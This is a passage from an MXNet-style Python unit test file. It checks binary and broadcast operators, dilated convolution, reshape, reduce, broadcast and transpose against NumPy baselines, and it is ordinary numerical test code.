return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
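# Bind the symbol on generated inputs and compare its forward result against the NumPy
# baseline (and optionally an mx.nd function); on mismatch, log the offending elements,
# including their hex encodings, before asserting.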
def check_binary_op_forward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5, mx_nd_func=None):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
y = symbol._bind(default_device(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])})
y.forward(is_train=True)
y = y.outputs[0].asnumpy()
x = baseline(d[0], d[1]).astype(y.dtype)
#np.set_printoptions(precision=20)
a = d[0]
b = d[1]
#print("a: {} {}".format(a.dtype, a))
#print("a: {} {}".format(b.dtype, b))
#print("x: {} {}".format(x.dtype, x))
#print("y: {} {}".format(y.dtype, y))
if mx_nd_func is not None:
d0 = mx.nd.array(d[0], dtype=d[0].dtype)
d1 = mx.nd.array(d[1], dtype=d[1].dtype)
assert_almost_equal(y, mx_nd_func(d0, d1).asnumpy(), rtol=rtol, atol=atol)
idx = np.abs(x-y) > atol+rtol*np.abs(x)
if idx.any():
import binascii
np.set_printoptions(precision=20)
logging.error('found precision problem:')
d[0] = np.broadcast_to(d[0], x.shape)
d[1] = np.broadcast_to(d[1], x.shape)
logging.error('input a: {}'.format(d[0][idx]))
logging.error('input b: {}'.format(d[1][idx]))
logging.error("output x: {} {}".format(x.dtype, x))
logging.error("output y: {} {}".format(y.dtype, y))
def ftohex(xs):
import struct
return list(map(lambda x: binascii.hexlify(struct.pack('d', x)), xs.flatten()))
logging.error('output x in baseline(a, b): {}'.format(x[idx]))
logging.error('output y in symbol(a, b): {}'.format(y[idx]))
logging.error('output x in baseline(a,b) hex: {}'.format(ftohex(x[idx])))
logging.error('output y in symbol(a,b) hex: {}'.format(ftohex(y[idx])))
logging.error('input a hex: {}'.format(ftohex(d[0][idx])))
            logging.error('input b hex: {}'.format(ftohex(d[1][idx])))
logging.error('diff: {}'.format(np.abs(x-y)[idx] - atol-rtol*np.abs(x)[idx]))
assert_allclose(y, x, rtol=rtol, atol=atol)
def check_binary_op_backward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
out = np.random.random((d[0] + d[1]).shape)
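        # Reduce a broadcast gradient back to the original input shape by summing
        # over every axis where the input had size 1.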
def reduce_op(shape, x):
if shape == x.shape:
return x
keepdims_shape = list(x.shape)
for i in range(len(shape)):
if x.shape[i] != shape[i]:
keepdims_shape[i] = 1
x = np.sum(x, axis=i).reshape(keepdims_shape)
return x
baseline_grad1, baseline_grad2 = baseline(out, d[0], d[1])
x_1 = reduce_op(d[0].shape, baseline_grad1)
x_2 = reduce_op(d[1].shape, baseline_grad2)
y_1 = mx.nd.empty(d[0].shape)
y_2 = mx.nd.empty(d[1].shape)
y = symbol._bind(default_device(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])},
args_grad=[y_1, y_2])
o = y.forward(is_train=True)
y.backward([mx.nd.array(out, dtype=o[0].dtype)])
assert_allclose(y_1.asnumpy(), x_1, rtol=rtol, atol=atol)
assert_allclose(y_2.asnumpy(), x_2, rtol=rtol, atol=atol)
def test_binary_op():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = a + b
check_binary_op_forward(c, lambda a, b: a + b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_binary_data)
def test_bminus(a, b):
c = a - b
check_binary_op_forward(c, lambda a, b: a - b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_binary_data)
def test_bmul(a, b):
c = a * b
check_binary_op_forward(c, lambda a, b: a * b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_binary_data)
def test_bdiv(a, b):
c = a / b
check_binary_op_forward(c, lambda a, b: a / b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_binary_data)
def test_bmod(a, b):
        # Python and numpy operate only in double, so to avoid numerical errors we have to use
        # doubles as well. This test was flaky when using float32 (seeds 1688524483 and 1768433044).
#c = a % b
c = mx.sym.cast(a, dtype='float64') % mx.sym.cast(b, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
check_binary_op_forward(c, lambda a, b: np.float32(a) % np.float32(b), gen_binary_data, rtol=0, atol=0)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.cast(a, dtype='int32') % mx.sym.cast(b, dtype='int32')
check_binary_op_forward(c, lambda a, b: a % b, gen_binary_data_int)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data_int)
def test_bpow(a, b):
c = a ** b
check_binary_op_forward(c, lambda a, b: a ** b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_binary_data)
def test_bneq(a, b):
c = a != b
# '!=' is sensitive to the precision of the comparison. Force numpy to match mxnet's float32.
# Issue exposed with seed 1644387363
check_binary_op_forward(c, lambda a, b: (np.float32(a) != np.float32(b)).astype(a.dtype), gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bneq(a, b)
def test_broadcast_binary_op():
def check_bmaxmin_gradient(test_sym, x, y, delta, rtol, atol):
"""This function ensures that checking the numerical gradient of
broadcast_max/min is not crossing the boundary y=x where there
is no gradient definition at those sigularities."""
x_max = np.max(x)
y = x_max + 2 * delta + np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
x_min = np.min(x)
y = x_min - 2 * delta - np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = mx.sym.broadcast_plus(a, b)
check_binary_op_forward(c, lambda a, b: a + b, gen_broadcast_data, mx_nd_func=mx.nd.add)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_broadcast_data)
def test_bminus(a, b):
c = mx.sym.broadcast_minus(a, b)
check_binary_op_forward(c, lambda a, b: a - b, gen_broadcast_data, mx_nd_func=mx.nd.subtract)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_broadcast_data)
def test_bmul(a, b):
c = mx.sym.broadcast_mul(a, b)
check_binary_op_forward(c, lambda a, b: a * b, gen_broadcast_data, mx_nd_func=mx.nd.multiply)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_broadcast_data)
def test_bdiv(a, b):
c = mx.sym.broadcast_div(a, b)
check_binary_op_forward(c, lambda a, b: a / b, gen_broadcast_data, mx_nd_func=mx.nd.divide)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_broadcast_data)
def test_bmod(a_, b_):
        # Python and numpy operate only in double, so to avoid numerical errors we have to use
        # doubles as well. This test was flaky when using float32 (seeds 1688524483 and 1768433044).
a = mx.sym.cast(a_, dtype='float64')
b = mx.sym.cast(b_, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
c = mx.sym.broadcast_mod(a, b)
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data, atol=1, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.broadcast_mod(mx.sym.cast(a, dtype='int32'), mx.sym.cast(b, dtype='int32'))
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data_int, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bpow(a, b):
c = mx.sym.broadcast_power(a, b)
check_binary_op_forward(c, lambda a, b: a ** b, gen_broadcast_data, mx_nd_func=mx.nd.power)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_broadcast_data)
def test_bequal(a, b):
c = mx.sym.broadcast_equal(a, b)
check_binary_op_forward(c, lambda a, b: (a == b).astype(a.dtype), gen_broadcast_data_int,
mx_nd_func=mx.nd.equal)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bmax(a, b):
c = mx.sym.broadcast_maximum(a, b)
check_binary_op_forward(c, lambda x, y: np.maximum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.maximum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bmin(a, b):
c = mx.sym.broadcast_minimum(a, b)
check_binary_op_forward(c, lambda x, y: np.minimum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.minimum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_band(a, b):
c = mx.sym.broadcast_logical_and(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_and(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_and)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bor(a, b):
c = mx.sym.broadcast_logical_or(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_or(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_or)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bxor(a, b):
c = mx.sym.broadcast_logical_xor(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_xor(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_xor)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bequal(a, b)
test_bmax(a, b)
test_bmin(a, b)
test_band(a, b)
test_bor(a, b)
test_bxor(a, b)
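# Dilated convolution is checked with an impulse response: with all-ones weights, a
# single spike input must produce an output (and input gradient) whose total mass
# equals the number of kernel elements, and feeding that gradient back through the
# network must reproduce the same value at the spike location.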
def test_run_convolution_dilated_impulse_response(dil=(1,1), kernel_shape=(3,3), verbose=False):
dim = len(dil)
assert(len(kernel_shape) == dim)
# Input for spike response
data_size = 33
data_shape = (1, 1) + (data_size,) * dim
center = (0,0) + (data_size // 2,) * dim
spike_imgs = np.zeros(shape=data_shape, dtype=np.float32)
spike_imgs[center] = 1.0
spike_img = mx.nd.array(spike_imgs)
spike_img2 = mx.nd.array(spike_imgs)
kernel_weights = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel_weights2 = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel = mx.symbol.Variable('kernel')
in_img = mx.symbol.Variable('input')
net = mx.symbol.Convolution(in_img, num_filter=1,kernel=kernel_shape, dilate=dil, no_bias="true", name='test_convolution')
net.list_arguments()
be = net._bind(default_device(), args={ 'input' : spike_img, 'test_convolution_weight' : kernel_weights},
args_grad={'input' : spike_img2, 'test_convolution_weight' : kernel_weights2 } )
be.forward(True)
out_o = be.outputs[0].asnumpy()
ndo = be.outputs[0]
out_grads = np.zeros(shape=be.outputs[0].shape, dtype=np.float32)
out_grads[center] = 1.0
out_grad = mx.nd.array(out_grads)
be.backward([out_grad])
vgrad = be.grad_arrays[0].asnumpy()
out = out_o.reshape(out_o.shape[2:])
nz_loc = np.nonzero(out)
assert_allclose(np.sum(out),np.prod(kernel_shape),atol=1e-5)
assert_allclose(np.sum(vgrad),np.prod(kernel_shape),atol=1e-5)
# Now check whether the input gradient was computed correctly
input_grad = mx.nd.array(vgrad)
be = net._bind(default_device(), args={ 'input' : input_grad, 'test_convolution_weight' : kernel_weights})
be.forward(True)
out_o = be.outputs[0].asnumpy()
assert_allclose(out_o[center],np.prod(kernel_shape),atol=1e-5)
rnd_kernel_s = np.random.uniform(low=0.0, high=1.0, size=tuple([1,1]+list(kernel_shape))).astype(np.float32)
impulse_error = mx.nd.array(out_o/np.sum(out_o)) # This should be 1.0 at [0,0,16,16]
rnd_kernel = mx.nd.array(rnd_kernel_s)
rnd_kernel2 = mx.nd.array(rnd_kernel_s)
white_in = mx.nd.ones(shape=data_shape)
white_in2 = mx.nd.ones(shape=data_shape)
be = net._bind(default_device(), args={ 'input' : white_in, 'test_convolution_weight' : rnd_kernel},
args_grad={'input' : white_in2, 'test_convolution_weight' : rnd_kernel2 } )
be.forward(True)
be.backward([impulse_error])
out_orig = be.outputs[0].asnumpy()
kernel_gradient = be.grad_arrays[1].asnumpy()
dkernel = mx.nd.array(rnd_kernel_s + kernel_gradient)
be = net._bind(default_device(), args={ 'input' : white_in, 'test_convolution_weight' : dkernel})
be.forward(True)
out = be.outputs[0].asnumpy()
# Now do a simple check of the kernel gradient
assert(out[center] - np.sum(kernel_gradient) - out_orig[center] < 0.001)
def test_convolution_dilated_impulse_response():
# 1D
for dil in [ (1,), (2,), (3,) ]:
for ks in [ (1,), (2,), (3,), (4,)]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 2D
for dil in [ (1,1), (2,2), (3,3) ]:
for ks in [ (3,3), (4,4), (2,3), (3,2), (1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 3D
for dil in [ (1,1,1), (2,2,2), (3,3,3) ]:
for ks in [ (3,3,3), (4,4,4), (2,3,4), (3,2,4), (1,1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
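# Reshape test cases: in shape_args, 0 keeps the corresponding input dim, -1 infers
# a dim from the remaining size, -2 copies all remaining dims, -3 merges two
# consecutive dims, and -4 splits a dim in two; reverse=True applies the same rules
# from right to left.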
@pytest.mark.serial
@pytest.mark.parametrize('src_shape,shape_args,reverse,dst_shape', [
((2, 3, 5, 5), (0, -1), False, (2, 75)),
((2, 3, 5, 5), (0, 0, -1), False, (2, 3, 25)),
((5, 3, 4, 5), (0, -1, 0), False, (5, 15, 4)),
((2, 3, 5, 4), (-1, 0, 0), False, (8, 3, 5)),
((2, 3, 5, 5), (0, 0, 0, 0), False, (2, 3, 5, 5)),
((2, 4, 5, 3), (-1, 2, 2, 1), False, (30, 2, 2, 1)),
((2, 3, 5, 6), (-2,), False, (2, 3, 5, 6)),
((2, 3, 5, 6), (6, 1, -2), False, (6, 1, 5, 6)),
((2, 3, 5, 6), (-3, -3), False, (6, 30)),
((2, 3, 5, 6), (-3, -1), False, (6, 30)),
((64,), (-4, 16, 4), False, (16, 4)),
((64,), (-4, 16, -1), False, (16, 4)),
((64, 1, 2, 3), (-4, 16, -1, -2), False, (16, 4, 1, 2, 3)),
((2, 3, 5, 5), (0, -1), True, (5, 30)),
((2, 3, 5, 5), (0, 0, -1), True, (3, 5, 10)),
((5, 3, 4, 5), (0, -1, 0), True, (3, 20, 5)),
((2, 3, 5, 4), (-1, 0, 0), True, (6, 5, 4)),
((2, 3, 4, 5), (3, -1, 0), True, (3, 8, 5)),
((2, 3, 5, 5), (5, 3, 0, -1), True, (5, 3, 5, 2)),
((2, 3, 5, 5), (0, 0, 0, 0), True, (2, 3, 5, 5)),
((2, 3, 5, 6), (-2,), True, (2, 3, 5, 6)),
((2, 3, 5, 6), (-2, 1, 30), True, (2, 3, 1, 30)),
((2, 3, 5, 6), (-3, -3), True, (6, 30)),
((64,), (16, 4, -4), True, (16, 4)),
((64,), (16, -1, -4), True, (16, 4)),
((1, 2, 3, 64), (-2, -1, 16, -4), True, (1, 2, 3, 4, 16))
])
def test_reshape_new(src_shape, shape_args, reverse, dst_shape):
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, shape=shape_args, reverse=reverse)
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(data=src_shape)
assert output_shape[0] == dst_shape, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
dat_npy = np.random.rand(*src_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net._simple_bind(default_device(), data=src_shape)
exe.arg_dict['data'][:] = dat_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - dat_npy.reshape(dst_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['data'].asnumpy() - grad_npy.reshape(src_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
for i in range(len(src_shape)):
holdout_src_shape = list(src_shape)
holdout_src_shape[i] = 0
holdout_src_shape = tuple(holdout_src_shape)
net = mx.sym.Variable('data')
net = mx.sym.elemwise_add(net.reshape(shape_args, reverse=reverse), mx.sym.ones(shape=dst_shape))
input_shape, output_shape, __ = net.infer_shape(data=holdout_src_shape)
assert output_shape[0] == dst_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
assert input_shape[0] == src_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
def test_reshape_old():
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, target_shape=(2, 0))
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(data=(2, 3, 5, 5))
assert(output_shape[0] == (2, 75))
# Test for Flatten
data = mx.sym.Variable("data")
net = mx.sym.Flatten(data)
exe = net._simple_bind(ctx=default_device(), data=(5, 4, 3, 7))
data_npy = np.random.normal(size=(5, 4, 3, 7))
out_grad_npy = np.random.normal(size=(5, 4 * 3 * 7))
outputs = exe.forward(is_train=True, data=data_npy)[0].asnumpy()
assert_allclose(outputs, data_npy.reshape((5, 4 * 3 * 7)))
exe.backward(out_grads=[mx.nd.array(out_grad_npy, ctx=default_device())])
assert_allclose(exe.grad_arrays[0].asnumpy(), out_grad_npy.reshape((5, 4, 3, 7)))
def test_reshape_like():
def test_reshape_like_new(lhs_shape, rhs_shape, lbeg, lend, rbeg, rend, dst_shape):
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs, lhs_begin=lbeg, lhs_end=lend, rhs_begin=rbeg, rhs_end=rend)
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(lhs=lhs_shape, rhs=rhs_shape)
assert output_shape[0] == dst_shape, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
lhs_npy = np.random.rand(*lhs_shape)
rhs_npy = np.random.rand(*rhs_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net._simple_bind(default_device(), lhs=lhs_shape, rhs=rhs_shape)
exe.arg_dict['lhs'][:] = lhs_npy
exe.arg_dict['rhs'][:] = rhs_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - lhs_npy.reshape(dst_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['lhs'].asnumpy() - grad_npy.reshape(lhs_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
# Test new api (Using shape)
test_cases = [
[(30,), (15,2,4), 0, None, 0, 2, (15,2)],
[(30,), (15,2,4), None, 1, None, 2, (15,2)],
[(30,7), (15,2,4), 0, 1, 0, 2, (15,2,7)],
[(3,5), (1,15,4), 0, 2, 1, 2, (15,)],
[(3,5), (1,15,4), 0, None, 1, -1, (15,)],
[(30,12), (4,2,2,3), -1, None, 1, None, (30,2,2,3)],
[(1,1,7,3,1,1), (81,1,1,21), 1, -1, 1, None, (1,1,1,21,1)]
]
for test_case in test_cases:
test_reshape_like_new(*test_case)
# Test old api
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs)
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(lhs=(40, 30), rhs=(30,20,2))
assert(output_shape[0] == (30,20,2))
def test_reduce():
sample_num = 500
def test_reduce_inner(numpy_reduce_func, numpy_reduce_grad_func, mx_reduce_sym, nan_prob=0,
test_exclude=True, test_none_axis=False):
for i in range(sample_num):
            # Generate random data with ndim between 1-5 and all the shape dims between 1-5
# Insert a NaN with probability equal to nan_prob
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
axis_num = np.random.randint(0, ndim, size=1)
axis_flags = np.random.randint(0, 2, size=ndim)
if test_exclude:
exclude = np.random.randint(0, 2)
else:
exclude = False
axes = []
for (axis, flag) in enumerate(axis_flags):
if flag:
axes.append(axis)
if 0 == len(axes):
axes = None
elif 1 == len(axes):
axes = axes[0]
else:
axes = tuple(axes)
keepdims = np.random.randint(0, 2)
a = mx.symbol.Variable('a')
if axes is None:
if test_none_axis:
b = mx_reduce_sym(a, keepdims=keepdims, axis=axes)
else:
b = mx_reduce_sym(a, keepdims=keepdims)
elif exclude and isinstance(axes, tuple) and len(axes) < ndim:
naxes = [i for i in range(ndim) if i not in axes]
b = mx_reduce_sym(a, axis=naxes, keepdims=keepdims, exclude=True)
else:
b = mx_reduce_sym(a, axis=axes, keepdims=keepdims)
dat_npy = np.random.rand(*shape)
# Test with both negative and positive values (randomly). Avoid having both in the same
# test, which can be problematic for error checking due to near-zero values.
if np.random.rand() > 0.5:
dat_npy = -dat_npy
if nan_prob > 0:
dat_npy[np.random.rand(*shape) < nan_prob] = np.nan
sum_groundtruth = np.array(numpy_reduce_func(dat_npy, axis=axes, keepdims=keepdims))
if sum_groundtruth.shape == ():
sum_groundtruth = np.array([sum_groundtruth])
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.array(np.random.rand(*sum_groundtruth.shape))
keepdim_shape = np_reduce(dat_npy, axes, 1, np.sum).shape
grad_groundtruth = numpy_reduce_grad_func(outgrad=outgrad_npy, data=dat_npy,
outdata=sum_groundtruth,
axis=axes, keepdims=keepdims,
keepdim_shape=keepdim_shape)
net = b._bind(default_device(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
# check forward
assert_almost_equal_ignore_nan(net.outputs[0].asnumpy(), sum_groundtruth, rtol=1e-4, atol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
bc_grad_groundtruth = np.broadcast_to(grad_groundtruth, grad_nd.shape)
# check backward
assert_almost_equal_ignore_nan(grad_nd.asnumpy(), bc_grad_groundtruth, rtol=1e-4, atol=1e-4)
test_none_axis = [True, False]
for test_none in test_none_axis:
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.sum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape),
mx.symbol.sum, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.mean),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape)/(data.size/outdata.size),
mx.symbol.mean, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.prod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (outdata.reshape(keepdim_shape) / data),
mx.symbol.prod, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nansum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape)),
mx.symbol.nansum, 0.3, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nanprod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape) *
(outdata.reshape(keepdim_shape) / data)),
mx.symbol.nanprod, 0.3, test_none_axis=test_none)
# grad of max and min are sensitive to the precision of the calculation.
# Force numpy to match mxnet's float32.
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.max),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.max)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.min),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.min)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.linalg.norm),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (data / outdata.reshape(keepdim_shape)),
mx.symbol.norm, test_exclude=False, test_none_axis=test_none)
def test_broadcast():
sample_num = 200
for _ in range(sample_num):
        # Generate random data with ndim between 1-5 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
target_shape = np.random.randint(1, 6, size=(ndim,))
axis = tuple(set(np.random.randint(0, ndim, np.random.randint(1, ndim + 1))))
shape = target_shape.copy()
size = tuple([shape[ele] for ele in axis])
for ele in axis:
shape[ele] = 1
target_shape_with_zero = list(target_shape)
for idx in range(len(target_shape_with_zero)):
if idx not in axis:
target_shape_with_zero[idx] = 0
break
a = mx.symbol.Variable('a')
sym_bcast_axis = mx.symbol.broadcast_axis(a, axis=axis, size=size)
sym_bcast_to = mx.symbol.broadcast_to(a, shape=tuple(target_shape))
sym_bcast_to_with_zero = mx.symbol.broadcast_to(a, shape=tuple(target_shape_with_zero))
sym_bcast_like = mx.symbol.broadcast_like(a, sym_bcast_to)
def test_broadcasting_ele(sym_bcast):
dat_npy = np.random.rand(*shape)
groundtruth = dat_npy
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.random.rand(*target_shape)
grad_groundtruth = np_reduce(outgrad_npy, axis=axis, keepdims=True,
numpy_reduce_func=np.sum)
net = sym_bcast._bind(default_device(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
assert (net.outputs[0].shape == target_shape).all()
assert_almost_equal(net.outputs[0], groundtruth, rtol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
assert_almost_equal(grad_nd, grad_groundtruth, rtol=1e-4)
test_broadcasting_ele(sym_bcast_axis)
test_broadcasting_ele(sym_bcast_to)
test_broadcasting_ele(sym_bcast_to_with_zero)
test_broadcasting_ele(sym_bcast_like)
def test_transpose():
for ndim in range(1, 10):
for _ in range(5):
dims = list(np.random.randint(1, 5, size=ndim))
axes = list(range(ndim))
random.shuffle(axes)
axes = tuple(axes)
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@pytest.mark.serial
def test_pseudo2dtranspose():
def getTwoInts(mn, mx):
n1 = np.random.randint(mn, mx)
n2 = np.random.randint(mn, mx-1)
n2 = n2 if n2 < n1 else n2+1
return tuple(np.sort([n1, n2]))
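    # Build a permutation that moves one contiguous block of axes to the end, so the
    # transpose is equivalent to a pseudo-2D (leading block x trailing block) transpose.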
def getTranspAxes(ndim):
axes = list(range(ndim))
n1, n2 = getTwoInts(0,ndim)
return tuple(axes[:n1]+axes[n2:]+axes[n1:n2])
for ndim in range(2, 7):
for dt in ['int8', 'half', 'int32', 'int64']:
for _ in range(5):
dims = list(np.random.randint(5, 20, size=ndim))
axes = getTranspAxes(ndim)
x = mx.nd.array(np.random.normal(size=dims), dtype=dt)
y = mx.nd.transpose(x, axes=axes)
